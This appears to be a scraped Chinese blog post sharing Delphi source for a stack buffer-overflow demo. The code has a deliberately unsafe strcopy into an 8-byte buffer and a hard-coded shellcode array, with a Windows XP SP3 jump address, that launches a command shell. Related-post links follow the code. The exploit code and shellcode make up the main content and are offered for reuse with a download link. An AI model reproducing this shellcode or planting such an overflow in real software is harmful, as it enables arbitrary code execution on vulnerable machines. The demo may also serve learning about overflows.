[源码]Dephi溢出demo( Shellcode for XP)

unit Unit1;

interface

uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls;

type

  TForm1 = class(TForm)

    Edit1: TEdit;

    Button1: TButton;

    Button3: TButton;

    procedure Button2Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button3Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;

var

  Form1: TForm1;

 const

     ShellCodeSize = $00000079;  //16进制 -  121

//delphi overflow demo  by k8team

ShellCode : Array[0..ShellCodeSize-1] of byte =

(

//AAAA BBBB CCCC

$41,$41,$41,$41,$42,$42,$42,$42,$43,$43,$43,$43,   //115 73

$12,$45,$fa,$7f,  // xp sp3 跳转地址

//CMD ShellCode

$55,$8B,$EC,$33,$C0,$50,$50,$50,    //105  69

$C6,$45,$F4,$4D,$C6,$45,$F5,$53,

$C6,$45,$F6,$56,$C6,$45,$F7,$43,

$C6,$45,$F8,$52,$C6,$45,$F9,$54,

$C6,$45,$FA,$2E,$C6,$45,$FB,$44,

$C6,$45,$FC,$4C,$C6,$45,$FD,$4C,

$8D,$45,$F4,$50,$BA,$7B,$1D,$80,

$7C,$FF,$D2,$55,$8B,$EC,$83,$EC,

$2C,$B8,$63,$6F,$6D,$6D,$89,$45,

$F4,$B8,$61,$6E,$64,$2E,$89,$45,

$F8,$B8,$63,$6F,$6D,$22,$89,$45,

$FC,$33,$D2,$88,$55,$FF,$8D,$45,

$F4,$50,$B8,$C7,$93,$BF,$77,$FF,

$D0

);

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

    k8test:=pchar(edit1.text);

    strcopy(test,k8test);     //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

  application.MessageBox('溢出了!','test');

end;

procedure TForm1.Button3Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

     k8test:=@ShellCode;

     strcopy(test,k8test);  //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

end.

https://github.com/k8gege/K8tools/blob/master/Dephi%E6%BA%A2%E5%87%BAdemo%20by%20k8team_1103%5BK8%5D.rar

[源码]Dephi溢出demo( Shellcode for XP)的更多相关文章

  1. 看源码和写demo是一种比较容易提升的方式

    github就是要这么用才行.看别人的源码,就能了解到很多规范,而写demo,就是自己写出自己的代码.莫欺少年穷

  2. 基于wke封装的duilib的webkit浏览器控件,可以c++与js互交,源码及demo下载地址

    转载请说明原出处,谢谢~~ 前些日子用wke内核封装了duilib的webkit浏览器控件,好多群里朋友私聊我希望可以我公布源码,今天把这个控件的源码和使用demo公布.其实这个控件封装起来没什么难度 ...

  3. [c#]asp.net开发微信公众平台(7)前6篇的整体框架demo源码

    这里给出的demo是具备整体框架的微信公众平台源码, 所谓demo就是拿过去就可以直接演示使用的东西,  当然不会具备非常详细的具体到业务层面.数据层面的东西, 每个人都可以在此基础上自由发挥,  只 ...

  4. Spring源码学习:第1步--在Spring源码中添加最简单的Demo代码

    为了最大程度地贴近Spring源码并进行学习,一种比较直接的做法是:直接在Spring源码中加入Demo代码,并进行调试. 参照以前使用Spring的经验,Spring最简单的使用方法是:一个实体类. ...

  5. [转]Asp.Net大型项目实践(11)-基于MVC Action粒度的权限管理【续】【源码在这里】(在线demo,全部源码)

    本文转自:http://www.cnblogs.com/legendxian/archive/2010/01/25/1655551.html 接上篇Asp.Net大型项目实践(10)-基于MVC Ac ...

  6. Entity Framework在Asp.net MVC中的实现One Context Per Request(附源码)

    上篇中"Entity Framework中的Identity map和Unit of Work模式", 由于EF中的Identity map和Unit of Work模式,EF体现 ...

  7. [AYUI]QQ管家源码已经开源

    (0-50元 黑色字体     享受AY 1周的 ayui 技术问答) (50-100元 绿色字体 享受AY 15天的 ayui 技术问答) (100-150元 蓝色字体 享受AY 20天的 ayui ...

  8. 语音分享应用ios源码

    该源码是语音分享应用源码,本demo使用了科大讯飞语音识别作为分享内容的输入方式,同时也支持手动键盘输入分享内容,限制分享内容文字不能超过180个字符,分享内容输入完成后可以直接分享,分享SDK使用的 ...

  9. C#源码大汇总

    C#高仿QQ2013可在广域网部署聊天系统GG叽叽 动态显示硬盘分区容量饼图 自定义ProgressBar控件高仿Win8进度条 多皮肤精美在线QQ悬浮客服插件 jQuery仿天猫首页多格焦点图片轮播 ...

随机推荐

  1. 解决HighChart开发遇到的2个问题

    需求很简单,显示一条24小时的变化曲线 写完代码效果是只有一条直线,连时间轴都没有 第1个错误  Highcharts error #12 当通过要绘制的点超过1000个时就会报这个错,我按分钟计算间 ...

  2. ELK填坑总结和优化过程

    做了几周的测试,踩了无数的坑,总结一下,全是干货,给大家分享~ 一.elk 实用知识点总结 1.编码转换问题(主要就是中文乱码) (1)input 中的codec => plain 转码 cod ...

  3. python的魔术方法

    什么叫魔术方法: 在python中定义以双下划线开头,有一些python自定义的函数,并且以双下划线为结尾的函数叫做魔法函数 class Company(object): def __init__(s ...

  4. 706. Design HashMap 实现哈希表

    [抄题]: public MyHashMap() {  主函数里面是装非final变量的,如果没有,可以一个字都不写 } [暴力解法]: 时间分析: 空间分析: [优化后]: 时间分析: 空间分析: ...

  5. maven打包不包含配置文件[z]

    如果使用maven-jar-plugin和maven-dependency-plugin打包,排除配置文件的方法: 上面的配置是把resources下的配置文件不打进项目的jar包中,主要使用的是&l ...

  6. ionic3使用第三方图标

    1.打开阿里图标库http://www.iconfont.cn 2.找到自己所需的图标,加入购物车(免费使用的) 3.打开购物车,点击右下角(下载代码) 4.解压文件,打开demo_unicode.h ...

  7. tick 能见度

    1.生成图形 当图片中的内容较多,相互遮盖时,可以通过设置相关内容的透明度来使图片更易于观察,也即是通过本节中的bbox参数设置来调节图像信息. import matplotlib.pyplot as ...

  8. The best way to use Xtool X100 PAD2 for FEM programming

    Look here: XTOOL X100 PAD2 is new FEM programming. Possible to use Xtool X100 PAD2 for FEM programmi ...

  9. IoGetRelatedDeviceObject学习

    PDEVICE_OBJECT IoGetRelatedDeviceObject( IN PFILE_OBJECT FileObject ) /*++ Routine Description: This ...

  10. 手动上传图片到nginx下可访问,程序上传后访问图片报403

    1. 首先查看文件权限 2. 初步确定是服务器权限问题 2.1 解决方案一:更改文件权限 2.2 解决方案二:修改nginx运行用户 1. 首先查看文件权限 #指令如下 ls -l 2. 初步确定是服 ...